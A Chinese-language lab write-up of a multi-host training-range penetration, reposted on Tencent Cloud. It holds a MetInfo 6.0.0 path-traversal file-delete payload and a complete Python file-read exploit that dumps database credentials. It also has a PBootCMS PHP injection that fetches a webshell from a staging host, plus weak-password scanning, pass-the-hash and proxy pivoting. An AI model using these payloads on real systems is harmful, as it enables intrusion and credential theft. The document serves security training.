CyberBear仿真渗透实战
本人才疏学浅,如果有不对的地方还请师傅们指正 靶场地址: https://www.cyberstrikelab.com/#/scene/detail/49
web1
访问ip为metinfo
访问/admin后台得到版本为metinfo6.0.0
metinfo6.0.0主要有两个漏洞,一个是任意文件删除,一个是任意文件读取
首先尝试任意文件删除,任意文件删除需要进入后台删除install.lock文件后对metinfo进行重装后获取权限,弱口令admin/admin123进后台
尝试使用payload
ounter(line
/admin/app/batch/csvup.php?fileField=test-1&flienamecsv=../../../config/install.lock
按复现文章直接删除保护文件后进入安装界面,但是这里尝试后利用不了
尝试使用任意文件读取,直接使用exp
ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(line
import requestsimport sys
banner = """MetInfo 6.0.0 ___________.__.__ __________ .___ \_ _____/|__| | ____ \______ \ ____ _____ __| _/ | __) | | | _/ __ \ | _// __ \\__ \ / __ | | \ | | |_\ ___/ | | \ ___/ / __ \_/ /_/ | \___ / |__|____/\___ > |____|_ /\___ >____ /\____ | \/ \/ \/ \/ \/ \/ Usage: python3 *.py http://192.168.80.139/MetInfo6.0.0/"""
headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"}
dir_list = [ "..././http/..././config/config_db.php", ".....///http/.....///config/config_db.php", "http/.....///.....///config/config_db.php", "http\..\..\config\config_db.php"]
def attack(host): vul = "/include/thumb.php" url = host + vul
res = requests.get(url = url, headers = headers)
if res.status_code != 200: print(f"[INFO] {vul} is Not Exists!") exit()
print(f"[INFO] {vul} is Exists!")
for param in dir_list: params = { "dir": param }
res = requests.get(url = url, params = params, headers = headers)
print(f"[INFO] Test URL: {res.url}")
if "<?php" in res.text: print("[RESULT] The target is vulnreable!") print(f"[RESULT]\n{res.text}") break
if len(sys.argv) < 2: print(banner) exit()
host = sys.argv[1]
attack(host = host)得到数据库账号密码
navicat连接
发现有met_password表
得到密码
rdp连接
获取flag
、
web2
上线cs
、
ip探测为双网卡
进行端口扫描发现开放了3389端口,猜测可能存在弱密码
通过Ladon进行扫描,得到弱密码qwe!@#123
ounter(line
Ladon 10.20.50.3 WmiScan
加密得到ntlm
通过psexec上线
上线成功
获取flag
cslab
信息搜集得到双网卡
端口扫描C段有三台存活主机,其中10.6.8.99有88、389端口开放,可能为域控
10.6.8.66开放80端口
首先在第一台主机做代理
然后在第二台主机做二层代理
挂代理后访问10.6.8.66的80端口,PBOOTCMS框架,这里用了fscan扫了一下前台的洞都打不了,应该是要进后台利用
admin/cslab进后台
这里进后台看了版本为3.1.2,应该洞还是挺多的,没手动去打了,可能手动去打在前台也能打下来
插入payload
ounter(lineounter(lineounter(lineounter(lineounter(lineounter(lineounter(line
<?php
$test="copy";
$test("http://10.6.8.50:80/1.txt","test.php");
?>
这里需要在前面拿下的主机起一个python服务,上传安装包安装python,方便远程访问
放一个1.txt的php木马,然后启动http服务
打开动态缓存,点击右上角的清除缓存
然后回到首页点击任意文章,触发漏洞
我这里是命名为test.php,访问一下存在
蚁剑连接
tcp beacon上线
读取flag
DC
这里试了很久其他的洞,什么委派,kerberos的洞,统统没有,就上了rdp去看cslab主机上安装的软件,发现有xshell,打开rdp直接连接
获取flag
mysql
这里发现10.6.8.0/24这个网段的主机都已经打完了,但是还差一个flag,应该是之前在双网卡的主机有遗漏,重新扫描发现10.20.50.0/24这个段有一台ip为10.20.50.8的主机开了3306
用弱口令工具得到账号密码root/admin123
navicat连接
得到flag
总结
这里mysql就只能拿个flag(不知道是不是因为我太菜了的原因),试了一下好像拿不到权限,所以上线就只有4台 总的来说整个靶场非常好,非常推荐!(靶场地址在开头)
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-12-10,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号